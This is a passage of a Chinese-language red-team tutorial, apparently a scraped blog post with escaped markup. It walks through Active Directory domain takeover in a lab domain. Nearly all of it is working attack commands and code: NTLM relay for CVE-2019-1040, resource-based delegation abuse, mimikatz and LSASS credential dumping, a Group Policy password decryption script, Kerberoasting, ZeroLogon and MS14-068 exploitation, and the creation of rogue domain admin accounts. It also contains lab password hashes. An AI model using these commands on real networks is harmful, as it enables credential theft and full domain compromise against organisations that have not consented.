python3 addcomputer.py -method SAMR -dc-ip 10.10.10.142 -computer-name moonsec -computer-pass pass@123 \"redteam.club\/hack:pass@123\"<\/code><\/pre>\n![\"1746684337415-a3acdd2d-178b-426e-b7a4-88c1aa2ed143.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae261f092e.png\")
<\/p>\npython3 ntlmrelayx.py -t ldap:\/\/10.10.10.142 -smb2support --remove-mic --delegate-access --escalate-user moonsec$ -debug<\/code><\/pre>\npython3 printerbug.py redteam.club\/hack:pass@123@10.10.10.140 10.10.10.139<\/code><\/pre>\n![\"1746684419487-66aa6552-6269-481f-9ee3-f2428ac4d039.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2648a3f6.png\")
<\/p>\n![\"1746684404256-2818ee96-ab7f-495f-806f-5dac24d763c2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2682186d.png\")
<\/p>\npython3 getST.py -dc-ip 10.10.10.142 redteam\/moonsec$:pass@123 -spncifs\/ad2.redteam.club -impersonate administrator\n\nexport KRB5CCNAME=administrator.ccache\nvi \/etc\/resolv.conf<\/code><\/pre>\n![\"1746684458370-c2bc7295-57b8-4090-b98d-15cc8ea46d17.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae26b1a942.png\")
<\/p>\n![\"1746684464889-74d94385-d319-47c6-a2bd-9d003b3b9700.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae26e141ab.png\")
<\/p>\npython3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-user administrator\npython3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-ntlm<\/code><\/pre>\n![\"1746684477815-e4a3ddee-fde6-462c-81cf-b9f32d44bc17.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2801969f.png\")
<\/p>\n![\"1746684489422-8b8659f9-4822-4187-9bc5-c43e914b2af2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae28353b08.png\")
<\/p>\npython3 smbexec.py -no-pass -k ad2.redteam.club<\/code><\/pre>\n![\"1746684504881-8c879780-b4e9-40a8-a78a-3d7c1db83434.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2873e67e.png\")
<\/p>\n\u590d\u73b02 \u8d44\u6e90\u59d4\u6d3e\u653b\u51fb\u5176\u4ed6\u57df\u4e3b\u673a\u83b7\u53d6system\u6743\u9650<\/h3>\n
using System;\nusing System.Security.Principal;\nusing System.DirectoryServices;\nnamespace ConsoleApp9\n{\nclass Program\n{\nstatic void Main(string[] args)\n{\nDirectoryEntry ldap_conn = new\nDirectoryEntry(\"LDAP:\/\/dc=redteam,dc=club\");\nDirectorySearcher search = new DirectorySearcher(ldap_conn);\nString query = \"(&(objectClass=computer))\";\/\/\u67e5\u627e\u8ba1\u7b97\u673a\nsearch.Filter = query;\nforeach (SearchResult r in search.FindAll())\n{\nString mS_DS_CreatorSID = \"\";\nString computername = \"\";\ntry\n{\ncomputername = r.Properties[\"dNSHostName\"][0].ToString();\nmS_DS_CreatorSID = (new\nSecurityIdentifier((byte[])r.Properties[\"mS-DS-CreatorSID\"][0], 0)).ToString();\n\/\/Console.WriteLine(\"{0} {1}n\", computername,\nmS_DS_CreatorSID);\n}\ncatch\n{\n;\n}\n\/\/\u518d\u901a\u8fc7sid\u627e\u7528\u6237\u540d\nString UserQuery = \"(&(objectClass=user))\";\nDirectorySearcher search2 = new DirectorySearcher(ldap_conn);\nsearch2.Filter = UserQuery;\nforeach (SearchResult u in search2.FindAll())\n{\nString user_sid = (new\nSecurityIdentifier((byte[])u.Properties[\"objectSid\"][0], 0)).ToString();\nif (user_sid == mS_DS_CreatorSID)\n{\n\/\/Console.WriteLine(\"debug\");\nString username = u.Properties[\"name\"][0].ToString();\nConsole.WriteLine(\"[*] [{0}] -> creator [{1}]\",\ncomputername, username);\n}\n}\n}\n}\n}\n}<\/code><\/pre>\n![\"1746684536670-d0dd89dc-25ec-426b-9f51-0293f7bba7c9.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae289c306e.png\")
<\/p>\nSharpAllowedToAct.exe -m hack -p pass@123 -t 12server2 -a 10.10.10.142\nredteam.club<\/code><\/pre>\n![\"1746684556672-9d332b64-d0ec-49c8-91e7-c6e632be09b8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae28c62536.png\")
<\/p>\npython3 getST.py -dc-ip 10.10.10.142 redteam\/hack$:pass@123 -spn\ncifs\/12server2.redteam.club -impersonate administrator<\/code><\/pre>\n![\"1746684573555-f578bc0a-b3b8-403d-8725-9ce7bb5216d4.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae28ed6117.png\")
<\/p>\nexport KRB5CCNAME=administrator.ccache\npython3 smbexec.py -no-pass -k 12server2.redteam.club<\/code><\/pre>\n![\"1746684594899-05d5c192-2856-4b30-95a3-88959310cbca.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae29262a49.png\")
<\/p>\n\u83b7\u53d6\u57df\u63a7\u6743\u9650\u7684\u65b9\u6cd5<\/h1>\n
\u9ad8\u6743\u9650\u8bfb\u53d6\u672c\u5730\u5bc6\u7801<\/h2>\n
privilege::debug # \u63d0\u6743\nsekurlsa::logonpasswords\nmimikatz \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\" >log.txt<\/code><\/pre>\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp<\/code><\/pre>\nmimikatz.exe \"sekurlsa::minidump lsass.dmp\" \"sekurlsa::logonPasswords full\" exit<\/code><\/pre>\nreg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest \/v\nUseLogonCredential \/t REG_DWORD \/d 1 \/f<\/code><\/pre>\nFunction Lock-WorkStation\n{\n$signature = @\"\n[DllImport(\"user32.dll\", SetLastError = true)]\npublic static extern bool LockWorkStation();\n\"@\n$LockWorkStation = Add-Type -memberDefinition $signature -name\n\"Win32LockWorkStation\" -namespace Win32Functions -passthru\n$LockWorkStation::LockWorkStation() | Out-Null\n}\nLock-WorkStation\n<\/code><\/pre>\n![\"1746685385022-1a903552-a978-45f4-afe8-0391784e8991.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2950f779.png\")
<\/p>\nnet use \\10.10.10.137ipc$ \"QWEasd123\" \/user:redteamadministrator\npython3 wmiexec.py -hashes\n00000000000000000000000000000000:42e2656ec24331269f82160ff5962387\nadministrator@10.10.10.137 \"whoami\"<\/code><\/pre>\n![\"1746685402460-b624fc6a-636a-473b-90e3-f2a041ebfcd9.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2973a3a9.png\")
<\/p>\nSYSVOL\u7ec4\u7b56\u7565\u83b7\u53d6\u5bc6\u7801<\/h2>\n
\\<DOMAIN>SYSVOL<DOMAIN><\/code><\/pre>\n![\"1746685438503-e59446ca-5039-492c-be45-5021a63e7423.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae29a7f153.png\")
<\/p>\nfunction Get-DecryptedCpassword {\n[CmdletBinding()]\nParam (\n[string] $Cpassword\n)\ntry {\n#Append appropriate padding based on string length\n$Mod = ($Cpassword.length % 4)\nswitch ($Mod) {\n'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}\n'2' {$Cpassword += ('=' * (4 - $Mod))}\n'3' {$Cpassword += ('=' * (4 - $Mod))}\n}\n$Base64Decoded = [Convert]::FromBase64String($Cpassword)\n#Create a new AES .NET Crypto Object\n$AesObject = New-Object\nSystem.Security.Cryptography.AesCryptoServiceProvider\n[Byte[]] $AesKey =\n@(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe\n8,\n0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)\n#Set IV to all nulls to prevent dynamic generation of IV value\n$AesIV = New-Object Byte[]($AesObject.IV.Length)\n$AesObject.IV = $AesIV\n$AesObject.Key = $AesKey\n$DecryptorObject = $AesObject.CreateDecryptor()\n[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded,\n0, $Base64Decoded.length)\nreturn [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)\n}\ncatch {Write-Error $Error[0]}\n}\nGet-DecryptedCpassword \"I0vK3Yj0SeoHQDxF5skcjt3BOkMZmX6IiqRVKCTo4Z4\"\n<\/code><\/pre>\nKerberoasting<\/h2>\n
setspn.exe -q *\/*\nsetspn.exe -T redteam.club -q *\/*<\/code><\/pre>\n![\"1746685546814-2f1be79e-8373-46ea-8401-5713e7f14689.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae29e2f6e4.png\")
<\/p>\ncscript GetUserSPNs.vbs<\/code><\/pre>\n![\"1746685567436-d1fa2204-8786-46a8-b619-543fef977b6b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2a1700e2.png\")
<\/p>\nImport-Module .PowerView.ps1\nGet-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon<\/code><\/pre>\nsetspn -s mysql\/12server4.redteam.club:3306 test<\/code><\/pre>\n![\"1746685603318-4879bab1-46b3-4bae-88b8-610d519463c8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2a3c868a.png\")
<\/p>\n\u65b9\u6cd51.\u7528mimikatz \u811a\u672c\u7a77\u4e3e<\/h3>\n
Add-Type -AssemblyName System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -\nArgumentList \"mysql\/12server4.redteam.club:3306\"<\/code><\/pre>\n![\"1746685631008-f46eaf7d-faa7-4471-839a-0a9099a4c0ad.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2a671fb1.png\")
<\/p>\npython3 tgsrepcrack.py wordlist.txt mssql.kirbi<\/code><\/pre>\n![\"1746685660401-de6e52db-a78e-4f11-953f-da25d198292b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2a8d9313.png\")
<\/p>\n\u65b9\u6cd52 \u4f7f\u7528hashcat\u7a77\u4e3e<\/h3>\n
Invoke-Kerberoast -OutputFormat Hashcat\nInvoke-Kerberoast -OutputFormat Hashcat | Select hash | ConvertTo-CSV -\nNoTypeInformation<\/code><\/pre>\n![\"1746685695088-43a801d2-d26e-4a2c-83ee-474fcb68b4a7.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2abe8d12.png\")
<\/p>\n\u5185\u7f51\u534f\u8baeNTLM\u4e4b\u5185\u7f51\u5927\u6740\u5668CVE-2019-1040\u6f0f\u6d1e<\/h2>\n
python3 addcomputer.py -method SAMR -dc-ip 10.10.10.142 -computer-name moonsec -\ncomputer-pass pass@123 \"redteam.club\/hack:pass@123\"<\/code><\/pre>\n![\"1746685742382-dbbd760f-5cc1-4fca-aa68-46a8576c1559.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2ae57a8a.png\")
<\/p>\npython3 ntlmrelayx.py -t ldap:\/\/10.10.10.142 -smb2support --remove-mic --\ndelegate-access --escalate-user moonsec$ -debug<\/code><\/pre>\n![\"1746685776693-0833c46b-927e-4fd1-94e0-0ee18e704f6c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2b20bb78.png\")
<\/p>\n![\"1746685790142-fb2600e2-edbe-44f3-99d1-21ecff8c0c8c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2b538d9c.png\")
<\/p>\npython3 getST.py -dc-ip 10.10.10.142 redteam\/moonsec$:pass@123 -spn\ncifs\/ad2.redteam.club -impersonate administrator<\/code><\/pre>\n![\"1746685803934-137ea835-d70a-4dcf-982a-d431f0d161c3.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2b8d84e7.png\")
<\/p>\nexport KRB5CCNAME=administrator.ccache\nvi \/etc\/resolv.conf<\/code><\/pre>\n![\"1746685811782-884ddb1b-ba58-4458-95a3-00ccb6536ab9.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2bbcb1d0.png\")
<\/p>\npython3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-user administrator\npython3 secretsdump.py -k -no-pass ad2.redteam.club -just-dc-ntlm<\/code><\/pre>\n![\"1746685826719-e2be4595-a40c-4ee0-a267-42db90378d97.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2bee268d.png\")
<\/p>\n![\"1746685831710-80021e43-fe44-4fec-9f1b-9aa6c15b55d6.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2c1ec8d2.png\")
<\/p>\npython3 smbexec.py -no-pass -k ad2.redteam.club<\/code><\/pre>\n![\"1746685856739-efe6d5f9-ced0-4b10-8b02-1c0c7eec4e00.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2c534916.png\")
<\/p>\nCVE-2020-1472-ZeroLogon<\/h2>\n
Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008\nR2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server\n2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2\nWindows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows\nServer 2016 (Server Core installation) Windows Server 2019 Windows Server 2019\n(Server Core installation) Windows Server, version 1903 (Server Core\ninstallation) Windows Server, version 1909 (Server Core installation) Windows\nServer, version 2004 (Server Core installation)<\/code><\/pre>\n![\"1746685892597-168d5332-c25c-45fc-b316-b597e32679b5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2c81d695.png\")
<\/p>\n![\"1746685916881-e482a8df-1e68-406f-9a87-19f2996fe899.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2ca4faae.png\")
<\/p>\n![\"1746685935343-48733c97-1b4f-470a-98ef-6cab4ab7cf40.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2cd4c6e3.png\")
<\/p>\npython wmiexec.py -hashes <HASH> DOMAIN\/DOMAIN_USER@DC_IP_ADDR\npython3 wmiexec.py -hashesaad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387redteam.club\/administrator@10.10.10.137<\/code><\/pre>\n![\"1746685968887-0a8282e2-b98b-4cdf-ad5d-80ba8bcbc18b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2d087ecb.png\")
<\/p>\nreg save HKLMSYSTEM system.save\nreg save HKLMSAM sam.save\nreg save HKLMSECURITY security.save\nget system.save\nget sam.save\nget security.save\ndel \/f system.save\ndel \/f sam.save\ndel \/f security.save\nexit<\/code><\/pre>\npython3 secretsdump.py -sam sam.save -system system.save -security security.save\nLOCAL<\/code><\/pre>\npython3 reinstall_original_pw.py ad01 10.10.10.137\n813f8ed1cab4b139a984ec6df5bff166c4370395c011194854c788172b5f09e8bc7d174505db585a\n0f77689274f23c5c9cc827f9d027bf2b59b9fddfe213019c2702a50a5aca3d4f4f4cf318d01a5b29\n3418aca75fedbffe5c3d16cf11c5b52216017f5cc961773e5efb1b8ab0db19104f29a972d9362897\na6bd93ba44d6366bed4f0ba5c9e0a315c65f0dfc63c5a3e718c810d95746d2622fb1b265c4bc43ff\n83570f184672c6186044ae52d118991a3f6f67d16aecc6273a0ec229182d9de4a22afb6ec8a7a54a\ned9ac87eda6f688e6d357aa74e4d5328deaf09f5b81a41f6e2e123f12b8105db8d30b5a3c025aced<\/code><\/pre>\n![\"1746686013521-b6b7a763-47a0-4189-a992-36657bb88bf7.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2d33d13c.png\")
<\/p>\npython3 secretsdump.py ad01.redteam.club\/administrator@10.10.10.137 -hashes:42e2656ec24331269f82160ff5962387<\/code><\/pre>\n![\"1746686030546-6e435681-6f1e-4ed3-aea7-3e40089e1733.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2d6cca23.png\")
<\/p>\nMS14-068\u6f0f\u6d1e\u8fdb\u884c\u63d0\u6743<\/h2>\n
MS14-068.exe -u test@moonsec.fbi -p 123456 -s S-1-5-21-2801122135-3886333168-\n273474972-1103 -d 08server-dc.moonsec.fbi<\/code><\/pre>\nkerberos::ptc TGT_test@moonsec.fbi.ccache<\/code><\/pre>\nPsExec.exe \\dc cmd.exe\n\/\/ \u6dfb\u52a0test\u7528\u6237net user test abc123! \/add \/domain\n\/\/ \u628a test \u7528\u6237\u6dfb\u52a0\u8fdb\u57df\u7ba1\u7406\u5458\u7ec4net group \"domain admins\" test \/add \/domain\n\/\/ \u67e5\u770b\u57df\u7ba1\u7406\u5458net group \"domain admins\" \/domain<\/code><\/pre>\npython3 goldenPac.py -dc-ip 192.168.0.142 -target-ip 192.168.0.142\nmoonsec.fbi\/test:123456@08server-dc.moonsec.fbi<\/code><\/pre>\n\u7a83\u53d6\u57df\u7ba1\u7406\u5458\u4ee4\u724c<\/h2>\n
add_user test abc123! -h \u57df\u63a7\u7684IP\u5730\u5740\nadd_group_user \"Domain Admins\" test -h \u57df\u63a7IP\u5730\u5740<\/code><\/pre>\n\u8fdb\u7a0b\u8fc1\u79fb<\/h2>\n
net group \"Domain Admins\" \/domain<\/code><\/pre>\n\/\/ \u6dfb\u52a0test\u7528\u6237\nnet user test admin@123 \/add \/domain\n\/\/ \u628a test \u7528\u6237\u6dfb\u52a0\u8fdb\u57df\u7ba1\u7406\u5458\u7ec4\nnet group \"domain admins\" test \/add \/domain<\/code><\/pre>\n\n
\n\u539f\u6587: https:\/\/www.yuque.com\/yuhui.net\/network\/uogw7rv1dgu506t1<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"